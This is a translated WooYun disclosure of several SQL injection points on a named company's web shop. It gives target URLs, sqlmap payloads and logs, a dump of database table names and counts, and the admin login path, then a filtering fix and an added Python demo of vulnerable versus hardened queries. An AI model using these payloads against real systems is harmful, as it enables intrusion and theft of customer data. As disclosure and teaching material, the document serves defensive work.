Vulnerability summary

Defect ID: wooyun-2015-0142219

Title: WAAWO Technology (哇喔科技) multiple additional SQL injections leak all user data + customer orders (thousands of devices remotely controllable) + access to the admin center

Vendor: WAAWO Technology (哇喔科技)

Author: 路人甲

Submitted: 2015-09-20 10:03

Fix time: 2015-11-04 10:04

Disclosed: 2015-11-04 10:04

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-04: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Bundling several injection points! SQL injection that can leak all user data and customer orders; after installing the app on a phone, thousands of devices can be controlled!

Detailed description:

Since some injection points have already been submitted, those are not submitted again; here are the other injection points:
Injection point 1:

http://www.waawo.cn/shops/network.php?province=16&city=226


Both province and city are injectable



database management system users [1]:
[*] 'waawo'@'localhost'
available databases [2]:
[*] information_schema
[*] waawo
Database: waawo
[101 tables]
+--------------------------------+
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_network |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_purchase_offline |
| ecs_purchase_online |
| ecs_purchase_store |
| ecs_purchase_store_branch |
| ecs_purchase_website |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_users |
| ecs_verify_code |
| ecs_view_network |
| ecs_view_purchase_offline |
| ecs_view_purchase_store_branch |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wholesale |
| ecs_yhj |
| ecs_youhuijuan |
| ecs_yushou |
+--------------------------------+
Database: waawo
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| ecs_stats | 170661 |
| ecs_youhuijuan | 46439 | ~40k coupons
| ecs_verify_code | 8537 |
| ecs_users | 4062 | ~4k users
| ecs_keywords | 3929 |
| ecs_region | 3408 |
| ecs_pay_log | 1226 | 1,000+ payment records
| ecs_admin_log | 1113 | 1,000+ admin login records
| ecs_order_action | 793 |
| ecs_sessions | 695 |
| ecs_order_goods | 611 |
| ecs_order_info | 583 |
| ecs_sessions_data | 567 |
| ecs_searchengine | 486 |
| ecs_user_address | 386 | user addresses
| ecs_account_log | 296 |
| ecs_delivery_goods | 253 |
| ecs_delivery_order | 231 | shipping information
| ecs_shop_config | 214 |
| ecs_admin_action | 115 |
| ecs_purchase_store_branch | 86 |
| ecs_view_purchase_store_branch | 86 |
| ecs_purchase_online | 72 |
| ecs_article | 46 |
| ecs_area_region | 39 |
| ecs_yushou | 34 |
| ecs_template | 22 |
| ecs_nav | 18 |
| ecs_yhj | 16 |
| ecs_article_cat | 14 |
| ecs_cat_recommend | 14 |
| ecs_mail_templates | 14 |
| ecs_brand | 12 |
| ecs_user_bonus | 10 |
| ecs_purchase_offline | 9 |
| ecs_view_purchase_offline | 9 |
| ecs_back_order | 8 |
| ecs_goods_activity | 8 |
| ecs_shipping | 7 |
| ecs_back_goods | 6 |
| ecs_goods | 6 |
| ecs_goods_attr | 6 |
| ecs_goods_gallery | 6 |
| ecs_package_goods | 6 |
| ecs_reg_fields | 6 |
| ecs_shipping_area | 6 |
| ecs_admin_user | 5 | administrators
| ecs_payment | 5 |
| ecs_volume_price | 5 |
| ecs_bonus_type | 4 |
| ecs_category | 3 |
| ecs_friend_link | 3 |
| ecs_member_price | 3 |
| ecs_user_rank | 3 |
| ecs_vote_option | 3 |
| ecs_booking_goods | 2 |
| ecs_exchange_goods | 2 |
| ecs_link_goods | 2 |
| ecs_purchase_store | 2 |
| ecs_purchase_website | 2 |
| ecs_snatch_log | 2 |
| ecs_suppliers | 2 |
| ecs_ad_position | 1 |
| ecs_attribute | 1 |
| ecs_auction_log | 1 |
| ecs_card | 1 |
| ecs_cart | 1 |
| ecs_email_sendlist | 1 |
| ecs_favourable_activity | 1 |
| ecs_goods_type | 1 |
| ecs_network | 1 |
| ecs_pack | 1 |
| ecs_role | 1 |
| ecs_topic | 1 |
| ecs_user_account | 1 |
| ecs_view_network | 1 |
| ecs_vote | 1 |
| ecs_wholesale | 1 |
+--------------------------------+---------+




Leaks user data and customer orders.
Of course, if you download the app, you can log in and remotely control thousands of devices! I won't download the app to test that.
Injection point 2:

http://www.waawo.cn/shops/purchase_area_offline.php?province=2&city=52&p=1


Again, province and city are injectable

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: city
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: province=2&city=52 AND 5053=5053&p=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: province=2&city=52 AND (SELECT 3272 FROM(SELECT COUNT(*),CONCAT(0x71686e6671,(SELECT (CASE WHEN (3272=3272) THEN 1 ELSE 0 END)),0x7178736971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&p=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: province=2&city=52 AND SLEEP(5)&p=1
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: province=2 AND 5749=5749&city=52&p=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: province=2 AND (SELECT 6013 FROM(SELECT COUNT(*),CONCAT(0x71686e6671,(SELECT (CASE WHEN (6013=6013) THEN 1 ELSE 0 END)),0x7178736971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=52&p=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: province=2 AND SLEEP(5)&city=52&p=1
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: city, type: Unescaped numeric (default)
[1] place: GET, parameter: province, type: Unescaped numeric
[q] Quit
> 0
[13:32:31] [INFO] testing MySQL
[13:32:31] [WARNING] reflective value(s) found and filtering out
[13:32:31] [INFO] confirming MySQL
[13:32:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[13:32:31] [INFO] fetching current user
[13:32:31] [INFO] resumed: waawo@localhost
current user: 'waawo@localhost'
[13:32:31] [INFO] fetching current database
[13:32:31] [INFO] resumed: waawo
current database: 'waawo'
[13:32:31] [INFO] testing if current user is DBA
[13:32:31] [INFO] fetching current user
current user is DBA: False


Injection point 3:

http://www.waawo.cn/shops/purchase_area_branch.php?province=16&city=220&store=1&p=1


Again, province and city are injectable, and store is injectable as well

[13:27:42] [INFO] testing connection to the target URL
[13:27:43] [INFO] testing if the target URL is stable. This can take a couple of seconds
[13:27:44] [INFO] target URL is stable
[13:27:44] [INFO] testing if GET parameter 'province' is dynamic
[13:27:44] [INFO] confirming that GET parameter 'province' is dynamic
[13:27:45] [INFO] GET parameter 'province' is dynamic
[13:27:45] [INFO] heuristic (basic) test shows that GET parameter 'province' might be injectable (possible DBMS: 'MySQL')
[13:27:45] [INFO] testing for SQL injection on GET parameter 'province'
[13:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:45] [WARNING] reflective value(s) found and filtering out
[13:27:46] [INFO] GET parameter 'province' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:27:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:46] [INFO] GET parameter 'province' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[13:27:46] [INFO] testing 'MySQL inline queries'
[13:27:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:27:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:28:47] [INFO] GET parameter 'province' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[13:28:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:28:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:28:52] [INFO] target URL appears to be UNION injectable with 1 columns
[13:28:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'province' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[13:29:00] [INFO] testing if GET parameter 'city' is dynamic
[13:29:00] [INFO] confirming that GET parameter 'city' is dynamic
[13:29:00] [INFO] GET parameter 'city' is dynamic
[13:29:00] [INFO] heuristic (basic) test shows that GET parameter 'city' might be injectable (possible DBMS: 'MySQL')
[13:29:00] [INFO] testing for SQL injection on GET parameter 'city'
[13:29:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:29:01] [INFO] GET parameter 'city' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:29:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:29:01] [INFO] GET parameter 'city' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[13:29:01] [INFO] testing 'MySQL inline queries'
[13:29:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:29:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:30:03] [INFO] GET parameter 'city' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[13:30:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:30:03] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:30:04] [INFO] target URL appears to have 1 column in query
[13:30:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'city' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[13:30:18] [INFO] testing if GET parameter 'store' is dynamic
[13:30:18] [INFO] confirming that GET parameter 'store' is dynamic
[13:30:19] [INFO] GET parameter 'store' is dynamic
[13:30:19] [INFO] heuristic (basic) test shows that GET parameter 'store' might be injectable (possible DBMS: 'MySQL')
[13:30:19] [INFO] testing for SQL injection on GET parameter 'store'
[13:30:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:30:20] [INFO] GET parameter 'store' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:30:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:30:21] [INFO] GET parameter 'store' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[13:30:21] [INFO] testing 'MySQL inline queries'
[13:30:21] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:30:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:31:21] [INFO] GET parameter 'store' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[13:31:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:31:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'store' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: city
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: province=16&city=220 AND 9286=9286&store=1&p=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: province=16&city=220 AND (SELECT 9021 FROM(SELECT COUNT(*),CONCAT(0x716d6a6771,(SELECT (CASE WHEN (9021=9021) THEN 1 ELSE 0 END)),0x71756d6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&store=1&p=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: province=16&city=220 AND SLEEP(5)&store=1&p=1
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: province=16 AND 7811=7811&city=220&store=1&p=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: province=16 AND (SELECT 1698 FROM(SELECT COUNT(*),CONCAT(0x716d6a6771,(SELECT (CASE WHEN (1698=1698) THEN 1 ELSE 0 END)),0x71756d6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=220&store=1&p=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: province=16 AND SLEEP(5)&city=220&store=1&p=1
Place: GET
Parameter: store
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: province=16&city=220&store=1 AND 4161=4161&p=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: province=16&city=220&store=1 AND (SELECT 5301 FROM(SELECT COUNT(*),CONCAT(0x716d6a6771,(SELECT (CASE WHEN (5301=5301) THEN 1 ELSE 0 END)),0x71756d6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&p=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: province=16&city=220&store=1 AND SLEEP(5)&p=1
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: province, type: Unescaped numeric (default)
[1] place: GET, parameter: city, type: Unescaped numeric
[2] place: GET, parameter: store, type: Unescaped numeric
[q] Quit
> 0
[13:31:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[13:31:31] [INFO] fetching current user
[13:31:32] [INFO] retrieved: waawo@localhost
current user: 'waawo@localhost'
[13:31:32] [INFO] fetching current database
[13:31:33] [INFO] retrieved: waawo
current database: 'waawo'
[13:31:33] [INFO] testing if current user is DBA
[13:31:33] [INFO] fetching current user
current user is DBA: False


4. A robots.txt file exists

http://www.waawo.cn/shops/robots.txt
User-agent: *
Disallow: /admin/
Disallow: /cert/
Disallow: /data/
Disallow: /includes/
Disallow: /install/
Disallow: /languages/
Disallow: /plugins/
Disallow: /templates/
Disallow: /themes/
Disallow: /upgrade/
Disallow: /api/
Disallow: /js/
Disallow: /affiche.php
Disallow: /captcha.php
Disallow: /comment.php
Disallow: /cycle_image.php
Disallow: /goods_script.php
Disallow: /receive.php
Disallow: /region.php
Disallow: /respond.php
Disallow: /feed.php
Disallow: /gallery.php


5. Entering the waawo admin center

http://www.waawo.cn/shops/admin/privilege.php?act=login


(screenshot: admin backend)


It seems the privileges are still not high enough! Looks like a super administrator account is needed.
WooYun: WAAWO Technology (哇喔科技) vulnerability in one location leaks all user data + customer orders (thousands of devices remotely controllable)

http://www.waawo.cn/media-news.php?id=37


This injection point still has not been fixed!

Proof of vulnerability:

As above

Fix recommendation:

Fix by filtering the injectable parameters
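The "Unescaped numeric" pattern sqlmap reports above, and the filtering fix recommended here, shown as an added example that is not from the original report or the site's code: an in-memory table standing in for the branch table queried by purchase_area_branch.php (schema, rows and function names are assumed), a lookup that interpolates province/city/store the vulnerable way, and a hardened lookup that rejects anything that is not a plain integer and binds parameters.

```python
import re
import sqlite3

# Constructed stand-in for the store-branch table behind
# purchase_area_branch.php; schema and rows are assumed, not the site's.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE branch (id INTEGER, province INTEGER, "
                 "city INTEGER, store INTEGER, name TEXT)")
    conn.executemany("INSERT INTO branch VALUES (?, ?, ?, ?, ?)", [
        (1, 16, 220, 1, "branch-a"),
        (2, 16, 221, 1, "branch-b"),
        (3, 2, 52, 2, "branch-c"),
    ])
    return conn

def vulnerable_lookup(conn, province, city, store):
    # The "Unescaped numeric" pattern: request values pasted straight into
    # the WHERE clause, so "220 AND 9286=9286" becomes part of the SQL.
    sql = ("SELECT name FROM branch WHERE province = %s AND city = %s "
           "AND store = %s" % (province, city, store))
    return [row[0] for row in conn.execute(sql)]

def hardened_lookup(conn, province, city, store):
    # Fix: whitelist the shape (digits only), then bind as parameters so the
    # value is never parsed as SQL.
    bound = []
    for value in (province, city, store):
        if not re.fullmatch(r"[0-9]{1,10}", str(value)):
            raise ValueError("rejected non-numeric parameter: %r" % (value,))
        bound.append(int(value))
    sql = "SELECT name FROM branch WHERE province = ? AND city = ? AND store = ?"
    return [row[0] for row in conn.execute(sql, bound)]

def run_demo():
    """Replay the report's boolean-based city payloads against both lookups."""
    conn = build_db()
    # Tautology keeps the row; contradiction drops it: that difference is
    # exactly what boolean-based blind inference reads.
    true_case = vulnerable_lookup(conn, "16", "220 AND 9286=9286", "1")
    false_case = vulnerable_lookup(conn, "16", "220 AND 9286=9287", "1")
    try:
        hardened_lookup(conn, "16", "220 AND 9286=9286", "1")
        rejected = False
    except ValueError:
        rejected = True
    clean = hardened_lookup(conn, "16", "220", "1")
    return true_case, false_case, rejected, clean

if __name__ == "__main__":
    print(run_demo())
```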

Copyright notice: please credit the source when reposting: 路人甲@WooYun


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined

Vulnerability Rank: 15 (WooYun rating)